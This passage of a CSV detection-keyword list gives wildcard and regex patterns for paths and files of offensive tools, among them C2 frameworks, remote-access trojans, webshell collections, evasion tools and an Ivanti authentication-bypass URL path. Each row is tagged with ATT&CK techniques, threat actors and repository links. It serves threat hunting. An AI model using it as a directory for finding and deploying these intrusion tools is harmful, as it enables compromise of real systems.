SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5362"
"*/api/users/1/disable?token=*",".{0,1000}\/api\/users\/1\/disable\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5363"
"*/api/v1/campaign/*/implants/*",".{0,1000}\/api\/v1\/campaign\/.{0,1000}\/implants\/.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","5364"
"*/api/v1/implants/*/execute*",".{0,1000}\/api\/v1\/implants\/.{0,1000}\/execute.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","5366"
"*/api/v1/implants/*/responses*",".{0,1000}\/api\/v1\/implants\/.{0,1000}\/responses.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","5367"
"*/api/v2/starkiller*",".{0,1000}\/api\/v2\/starkiller.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5368"
"*/api_hooking.exe*",".{0,1000}\/api_hooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","5369"
"*/api0cradle/CVE-*",".{0,1000}\/api0cradle\/CVE\-.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","N/A","4","344","63","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z","5370"
"*/Apollo.exe*",".{0,1000}\/Apollo\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","5371"
"*/Apollo.git*",".{0,1000}\/Apollo\.git.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","5372"
"*/Apollo/Agent/*",".{0,1000}\/Apollo\/Agent\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","5373"
"*/ApolloInterop.*",".{0,1000}\/ApolloInterop\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","5374"
"*/ApolloInterop/*",".{0,1000}\/ApolloInterop\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","5375"
"*/apollon-all-x64*",".{0,1000}\/apollon\-all\-x64.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","N/A","8","1","21","7","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z","5376"
"*/apollon-main.zip*",".{0,1000}\/apollon\-main\.zip.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","N/A","8","1","21","7","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z","5377"
"*/apollon-selective-x64*",".{0,1000}\/apollon\-selective\-x64.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","N/A","8","1","21","7","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z","5378"
"*/ApolloTest.exe",".{0,1000}\/ApolloTest\.exe","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","5379"
"*/app/bin/merlinAgent*",".{0,1000}\/app\/bin\/merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","5380"
"*/AppProxyC2.git*",".{0,1000}\/AppProxyC2\.git.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","1","N/A","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","5387"
"*/apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers*",".{0,1000}\/apps\/zxtm\/wizard\.fcgi\?error\=1\&section\=Access\+Management\%3ALocalUsers.{0,1000}","offensive_tool_keyword","POC","Ivanti Authent Bypass CVE-2024-7593 - Successful exploitation could lead to authentication bypass and creation of an administrator user","T1078 - T1136 - T1078.001","TA0006 - TA0004 - TA0005","N/A","N/A","Credential Access","https://x.com/mthcht/status/1823463842459848906","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5388"
"*/Aqua Server Editor.exe*",".{0,1000}\/Aqua\sServer\sEditor\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5389"
"*/aquasecurity/cloudsploit*",".{0,1000}\/aquasecurity\/cloudsploit.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua - Cloud Security Scans","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","5390"
"*/AquaServer.exe*",".{0,1000}\/AquaServer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5391"
"*/Aquates Rat.exe*",".{0,1000}\/Aquates\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5392"
"*/arabicspy.php*",".{0,1000}\/arabicspy\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5393"
"*/Arbitrium-RAT.git*",".{0,1000}\/Arbitrium\-RAT\.git.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","1","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","5394"
"*/Ares.git",".{0,1000}\/Ares\.git","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","5395"
"*/ares.py *",".{0,1000}\/ares\.py\s.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","5396"
"*/ArgFuscator.zip*",".{0,1000}\/ArgFuscator\.zip.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","5397"
"*/args_spoofing-rs.exe*",".{0,1000}\/args_spoofing\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","5398"
"*/armitage.git*",".{0,1000}\/armitage\.git.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","N/A","2","129","32","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z","5399"
"*/arp_scanner.*",".{0,1000}\/arp_scanner\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5400"
"*/arp_spoof/*",".{0,1000}\/arp_spoof\/.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","5401"
"*/arsenal.git*",".{0,1000}\/arsenal\.git.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","5402"
"*/arsenal-1.1.0.zip*",".{0,1000}\/arsenal\-1\.1\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","5403"
"*/arsenal-1.2.0.zip*",".{0,1000}\/arsenal\-1\.2\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","5404"
"*/arsenal-1.2.1.zip*",".{0,1000}\/arsenal\-1\.2\.1\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","5405"
"*/arsenal-master.zip*",".{0,1000}\/arsenal\-master\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","5406"
"*/artifactor.py*",".{0,1000}\/artifactor\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","5407"
"*/ase_docker/*",".{0,1000}\/ase_docker\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","5408"
"*/Ask4Creds.git*",".{0,1000}\/Ask4Creds\.git.{0,1000}","offensive_tool_keyword","Ask4Creds","Prompt User for credentials","T1056 - T1071","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Leo4j/Ask4Creds","1","1","N/A","N/A","8","1","1","0","2024-03-20T17:09:21Z","2023-11-12T15:21:40Z","5409"
"*/Ask4Creds.ps1*",".{0,1000}\/Ask4Creds\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","5410"
"*/Ask4Creds.ps1*",".{0,1000}\/Ask4Creds\.ps1.{0,1000}","offensive_tool_keyword","Ask4Creds","Prompt User for credentials","T1056 - T1071","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Leo4j/Ask4Creds","1","1","N/A","N/A","8","1","1","0","2024-03-20T17:09:21Z","2023-11-12T15:21:40Z","5411"
"*/asleap.exe*",".{0,1000}\/asleap\.exe.{0,1000}","offensive_tool_keyword","asleap","Exploiting a serious deficiency in proprietary Cisco LEAP networks","T1078 - T1557 - T1040","TA0006 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/joswr1ght/asleap","1","1","N/A","N/A","10","1","88","20","2021-06-21T00:13:17Z","2016-08-30T13:00:21Z","5412"
"*/asn-query.nse*",".{0,1000}\/asn\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5413"
"*/ASP.NET Web BackDoor.aspx*",".{0,1000}\/ASP\.NET\sWeb\sBackDoor\.aspx.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5414"
"*/ASPJinjaObfuscator.git*",".{0,1000}\/ASPJinjaObfuscator\.git.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","1","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","5415"
"*/asprox.profile*",".{0,1000}\/asprox\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","5416"
